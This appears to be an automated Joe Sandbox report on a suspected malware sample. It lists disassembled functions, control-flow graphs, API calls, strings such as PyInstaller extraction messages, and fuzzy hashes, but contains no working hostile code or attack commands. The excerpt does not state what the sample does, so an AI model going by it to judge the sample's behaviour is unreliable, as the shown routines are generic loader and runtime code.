                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                    • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                    • Instruction ID: cead5740d0fc8d511b4d287351b0d3642f872878ce8ae89d2c6b70e8d010f390
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941C721A0E54280EA22BB28E4481BBE360FB66754FC40632D75D86A9CFFBCD549C714
                                                                                                                                                                                                                                    Function 00007FF7B2B85E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1014 7ff7b2b85e7c-7ff7b2b85eb1 call 7ff7b2b85588 call 7ff7b2b85590 call 7ff7b2b855f8 1021 7ff7b2b85eb7-7ff7b2b85ec2 call 7ff7b2b85598 1014->1021 1022 7ff7b2b85fef-7ff7b2b8605d call 7ff7b2b7a900 call 7ff7b2b81578 1014->1022 1021->1022 1027 7ff7b2b85ec8-7ff7b2b85ed3 call 7ff7b2b855c8 1021->1027 1034 7ff7b2b8606b-7ff7b2b8606e 1022->1034 1035 7ff7b2b8605f-7ff7b2b86066 1022->1035 1027->1022 1033 7ff7b2b85ed9-7ff7b2b85efc call 7ff7b2b7a948 GetTimeZoneInformation 1027->1033 1048 7ff7b2b85fc4-7ff7b2b85fee call 7ff7b2b85580 call 7ff7b2b85570 call 7ff7b2b85578 1033->1048 1049 7ff7b2b85f02-7ff7b2b85f23 1033->1049 1036 7ff7b2b860a5-7ff7b2b860b8 call 7ff7b2b7d5fc 1034->1036 1037 7ff7b2b86070 1034->1037 1039 7ff7b2b860fb-7ff7b2b860fe 1035->1039 1052 7ff7b2b860ba 1036->1052 1053 7ff7b2b860c3-7ff7b2b860de call 7ff7b2b81578 1036->1053 1042 7ff7b2b86073 1037->1042 1041 7ff7b2b86104-7ff7b2b8610c call 7ff7b2b85c00 1039->1041 1039->1042 1046 7ff7b2b86078-7ff7b2b860a4 call 7ff7b2b7a948 call 7ff7b2b6c550 1041->1046 1042->1046 1047 7ff7b2b86073 call 7ff7b2b85e7c 1042->1047 1047->1046 1055 7ff7b2b85f2e-7ff7b2b85f35 1049->1055 1056 7ff7b2b85f25-7ff7b2b85f2b 1049->1056 1061 7ff7b2b860bc-7ff7b2b860c1 call 7ff7b2b7a948 1052->1061 1073 7ff7b2b860e5-7ff7b2b860f7 call 7ff7b2b7a948 1053->1073 1074 7ff7b2b860e0-7ff7b2b860e3 1053->1074 1057 7ff7b2b85f49 1055->1057 1058 7ff7b2b85f37-7ff7b2b85f3f 1055->1058 1056->1055 1065 7ff7b2b85f4b-7ff7b2b85fbf call 7ff7b2b8a4d0 * 4 call 7ff7b2b82b5c call 7ff7b2b86114 * 2 1057->1065 1058->1057 1063 7ff7b2b85f41-7ff7b2b85f47 1058->1063 1061->1037 1063->1065 1065->1048 1073->1039 1074->1061
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855DC
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                    • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                    • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                    • Instruction ID: 1fc54b5876b81c746acc20289d48d64227c7635e6b9061996f4e4ec53b86d0e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E651E622A1924286E312FF29D4855ABF360FB6A744FC14139DB4D4B69AFFBCE400C760
                                                                                                                                                                                                                                    Function 00007FF7B2B69280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                    • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                    • Instruction ID: d2110104ec7205ee03b1d9cac80374c48a8c3c1b80b4462dcf66a95718dd1f68
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F02D22A1974182F7619B68B489377F350BB55324F840335DBAD456D8EF7CD048C704
                                                                                                                                                                                                                                    Function 00007FF7B2B808C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1010374628-0
                                                                                                                                                                                                                                    • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                    • Instruction ID: a25ae80ef17b1ce643edd3fc4303592528a2c946cc0b7765bcdbdc3b53b0b19d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F025021A1B64241FE97BB1D540427BA694AF63BE0FC58938DF5D4A7D9FEBCA401C320
                                                                                                                                                                                                                                    Function 00007FF7B2B61950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 331 7ff7b2b61950-7ff7b2b6198b call 7ff7b2b645c0 334 7ff7b2b61c4e-7ff7b2b61c72 call 7ff7b2b6c550 331->334 335 7ff7b2b61991-7ff7b2b619d1 call 7ff7b2b67f90 331->335 340 7ff7b2b61c3b-7ff7b2b61c3e call 7ff7b2b7004c 335->340 341 7ff7b2b619d7-7ff7b2b619e7 call 7ff7b2b706d4 335->341 345 7ff7b2b61c43-7ff7b2b61c4b 340->345 346 7ff7b2b61a08-7ff7b2b61a24 call 7ff7b2b7039c 341->346 347 7ff7b2b619e9-7ff7b2b61a03 call 7ff7b2b74f08 call 7ff7b2b62910 341->347 345->334 353 7ff7b2b61a26-7ff7b2b61a40 call 7ff7b2b74f08 call 7ff7b2b62910 346->353 354 7ff7b2b61a45-7ff7b2b61a5a call 7ff7b2b74f28 346->354 347->340 353->340 361 7ff7b2b61a5c-7ff7b2b61a76 call 7ff7b2b74f08 call 7ff7b2b62910 354->361 362 7ff7b2b61a7b-7ff7b2b61afc call 7ff7b2b61c80 * 2 call 7ff7b2b706d4 354->362 361->340 373 7ff7b2b61b01-7ff7b2b61b14 call 7ff7b2b74f44 362->373 376 7ff7b2b61b16-7ff7b2b61b30 call 7ff7b2b74f08 call 7ff7b2b62910 373->376 377 7ff7b2b61b35-7ff7b2b61b4e call 7ff7b2b7039c 373->377 376->340 383 7ff7b2b61b50-7ff7b2b61b6a call 7ff7b2b74f08 call 7ff7b2b62910 377->383 384 7ff7b2b61b6f-7ff7b2b61b8b call 7ff7b2b70110 377->384 383->340 390 7ff7b2b61b9e-7ff7b2b61bac 384->390 391 7ff7b2b61b8d-7ff7b2b61b99 call 7ff7b2b62710 384->391 390->340 394 7ff7b2b61bb2-7ff7b2b61bb9 390->394 391->340 397 7ff7b2b61bc1-7ff7b2b61bc7 394->397 398 7ff7b2b61bc9-7ff7b2b61bd6 397->398 399 7ff7b2b61be0-7ff7b2b61bef 397->399 400 7ff7b2b61bf1-7ff7b2b61bfa 398->400 399->399 399->400 401 7ff7b2b61bfc-7ff7b2b61bff 400->401 402 7ff7b2b61c0f 400->402 401->402 404 7ff7b2b61c01-7ff7b2b61c04 401->404 403 7ff7b2b61c11-7ff7b2b61c24 402->403 405 7ff7b2b61c2d-7ff7b2b61c39 403->405 406 7ff7b2b61c26 403->406 404->402 407 7ff7b2b61c06-7ff7b2b61c09 404->407 405->340 405->397 406->405 407->402 408 7ff7b2b61c0b-7ff7b2b61c0d 407->408 408->403
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B67F90: _fread_nolock.LIBCMT ref: 00007FF7B2B6803A
                                                                                                                                                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF7B2B61A1B
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                    • Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                                    • Instruction ID: 3ebe62b530dbe395818ae56b507cd4531cc80e8cb1b47b6e0aadcfa77e58790f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8481C131A1A68285EB13AB2C90442AAF3A1EB66740F844435DB4D8B79DFEBCE045C724
                                                                                                                                                                                                                                    Function 00007FF7B2B61600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 409 7ff7b2b61600-7ff7b2b61611 410 7ff7b2b61637-7ff7b2b61651 call 7ff7b2b645c0 409->410 411 7ff7b2b61613-7ff7b2b6161c call 7ff7b2b61050 409->411 418 7ff7b2b61653-7ff7b2b61681 call 7ff7b2b74f08 call 7ff7b2b62910 410->418 419 7ff7b2b61682-7ff7b2b6169c call 7ff7b2b645c0 410->419 416 7ff7b2b6162e-7ff7b2b61636 411->416 417 7ff7b2b6161e-7ff7b2b61629 call 7ff7b2b62710 411->417 417->416 425 7ff7b2b6169e-7ff7b2b616b3 call 7ff7b2b62710 419->425 426 7ff7b2b616b8-7ff7b2b616cf call 7ff7b2b706d4 419->426 433 7ff7b2b61821-7ff7b2b61824 call 7ff7b2b7004c 425->433 434 7ff7b2b616f9-7ff7b2b616fd 426->434 435 7ff7b2b616d1-7ff7b2b616f4 call 7ff7b2b74f08 call 7ff7b2b62910 426->435 441 7ff7b2b61829-7ff7b2b6183b 433->441 438 7ff7b2b61717-7ff7b2b61737 call 7ff7b2b74f44 434->438 439 7ff7b2b616ff-7ff7b2b6170b call 7ff7b2b61210 434->439 447 7ff7b2b61819-7ff7b2b6181c call 7ff7b2b7004c 435->447 448 7ff7b2b61739-7ff7b2b6175c call 7ff7b2b74f08 call 7ff7b2b62910 438->448 449 7ff7b2b61761-7ff7b2b6176c 438->449 446 7ff7b2b61710-7ff7b2b61712 439->446 446->447 447->433 463 7ff7b2b6180f-7ff7b2b61814 448->463 453 7ff7b2b61802-7ff7b2b6180a call 7ff7b2b74f30 449->453 454 7ff7b2b61772-7ff7b2b61777 449->454 453->463 456 7ff7b2b61780-7ff7b2b617a2 call 7ff7b2b7039c 454->456 464 7ff7b2b617da-7ff7b2b617e6 call 7ff7b2b74f08 456->464 465 7ff7b2b617a4-7ff7b2b617bc call 7ff7b2b70adc 456->465 463->447 472 7ff7b2b617ed-7ff7b2b617f8 call 7ff7b2b62910 464->472 470 7ff7b2b617be-7ff7b2b617c1 465->470 471 7ff7b2b617c5-7ff7b2b617d8 call 7ff7b2b74f08 465->471 470->456 473 7ff7b2b617c3 470->473 471->472 476 7ff7b2b617fd 472->476 473->476 476->453
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                    • Opcode ID: 80c814cc98e6b2aff898b1ce4eb0b94af8f5089607ff04406bfc182d1f16ad7b
                                                                                                                                                                                                                                    • Instruction ID: 801cc7101296fededb8cf7b9658180df8f68eae9e06a7eda00eb612a8e25d809
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80c814cc98e6b2aff898b1ce4eb0b94af8f5089607ff04406bfc182d1f16ad7b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518F61A1A64281EA17BB2994001A7F360AF62794FC44535EF0C877AEFEBCE555C324
                                                                                                                                                                                                                                    Function 00007FF7B2B68660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B68704
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6870A
                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6874C
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68830: GetEnvironmentVariableW.KERNEL32(00007FF7B2B6388E), ref: 00007FF7B2B68867
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B2B68889
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B78251
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                    • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                    • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                    • Instruction ID: 093af77840f8d4d39685e86d7ea05eef8b0997deeb2c615fd80b986a5536432a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F419211A1B64280F917B72D98552BBD261AF66780FC04532DF0D8B7AEFEBCE505C224
                                                                                                                                                                                                                                    Function 00007FF7B2B61210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 756 7ff7b2b61210-7ff7b2b6126d call 7ff7b2b6bd80 759 7ff7b2b61297-7ff7b2b612af call 7ff7b2b74f44 756->759 760 7ff7b2b6126f-7ff7b2b61296 call 7ff7b2b62710 756->760 765 7ff7b2b612d4-7ff7b2b612e4 call 7ff7b2b74f44 759->765 766 7ff7b2b612b1-7ff7b2b612cf call 7ff7b2b74f08 call 7ff7b2b62910 759->766 772 7ff7b2b61309-7ff7b2b6131b 765->772 773 7ff7b2b612e6-7ff7b2b61304 call 7ff7b2b74f08 call 7ff7b2b62910 765->773 777 7ff7b2b61439-7ff7b2b6146d call 7ff7b2b6ba60 call 7ff7b2b74f30 * 2 766->777 776 7ff7b2b61320-7ff7b2b61345 call 7ff7b2b7039c 772->776 773->777 785 7ff7b2b6134b-7ff7b2b61355 call 7ff7b2b70110 776->785 786 7ff7b2b61431 776->786 785->786 792 7ff7b2b6135b-7ff7b2b61367 785->792 786->777 794 7ff7b2b61370-7ff7b2b61398 call 7ff7b2b6a1c0 792->794 797 7ff7b2b6139a-7ff7b2b6139d 794->797 798 7ff7b2b61416-7ff7b2b6142c call 7ff7b2b62710 794->798 799 7ff7b2b6139f-7ff7b2b613a9 797->799 800 7ff7b2b61411 797->800 798->786 802 7ff7b2b613ab-7ff7b2b613b9 call 7ff7b2b70adc 799->802 803 7ff7b2b613d4-7ff7b2b613d7 799->803 800->798 809 7ff7b2b613be-7ff7b2b613c1 802->809 804 7ff7b2b613ea-7ff7b2b613ef 803->804 805 7ff7b2b613d9-7ff7b2b613e7 call 7ff7b2b89e30 803->805 804->794 808 7ff7b2b613f5-7ff7b2b613f8 804->808 805->804 811 7ff7b2b6140c-7ff7b2b6140f 808->811 812 7ff7b2b613fa-7ff7b2b613fd 808->812 813 7ff7b2b613c3-7ff7b2b613cd call 7ff7b2b70110 809->813 814 7ff7b2b613cf-7ff7b2b613d2 809->814 811->786 812->798 815 7ff7b2b613ff-7ff7b2b61407 812->815 813->804 813->814 814->798 815->776
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                    • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                    • Instruction ID: 53144fe4709357f67e346b8ad92ddd747339be192bd9fb102a0e99d6239dbdf4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E51C522A1A64241EA23BB1994403BBF290AF66794FC84135EF4D87BDDFEBCD441C714
